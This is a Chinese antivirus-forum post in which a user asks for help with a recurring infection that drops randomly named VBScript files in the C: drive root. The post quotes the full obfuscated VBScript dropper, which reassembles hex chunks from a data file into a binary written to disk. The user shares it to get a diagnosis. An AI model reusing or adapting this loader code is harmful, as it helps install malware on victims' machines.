guojing075
新手上路
积分 9
发帖 9
注册 2007-8-16
|
#1 你好版主!又发现个新的病毒,目前杀不了
接通上网,自动下载在C盘根目录生成 随机名.vbs 和无后缀文件,vbs调用生成EXE文件被微点当场杀掉,但是C盘反复生成。生成来源是WINDOW脚本宿主,没问题,我把脚本宿主禁用,EXE生成不了,但是反复在C盘根目录生成 随机名.vbs 和 随机名.无后缀文件,请问来源是哪里?
VBS内容如下:
-----------------------------------------------------
oN errOr RESUmE NeXT:m=1 O:seT K=CReAtEoBjecT("sCRipting.FILESYSTEMObJECt" O whILE k.fIleeXisTS("C:\inmvzgn"=FaLSe:wSCripT.sleeP(1000):lOoP:seT v=K.OpeNtexTfIlE("C:\inmvzgn",1):dO wHiLE V.AteNdofstreAM=False:t=v.REAdLINe:e=lEN(T):c=lefT(t,2):selEcT CaSe trUE:cAse isnuMeriC(c)=False:CaSE e=3967+3 and InT(C)=m:i=I+MiD(t,3,3967):m=m+1:cASe E=911+3 and INt(c)=m:i=I+miD(T,3,911):M=m+1:eND SELECT:looP:v.CloSe:IF 16+1=m tHEN:r=LEN(I)/2:seT x=cREaTEobject("adoDb.recOrDseT":x.fielDS.ApPeNd "M",205,r:x.OpEN:X.aDdnEW:X("M"=I:x.Update:i=X("m".GEtChUnK(r):sET q=CReatEobjEct("Adodb.STream":WITH Q:.ModE=3:.Type=1:.OPEn():.wRItE i:.sAVEtOFilE "C:\rifqcob",2:eND WitH:wScriPt.quiT:ENd If:wScriPt.sLeeP(200):lOOp
-----------------------------------------------------
| |
※ ※ ※ 本文纯属【guojing075】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
 |
|
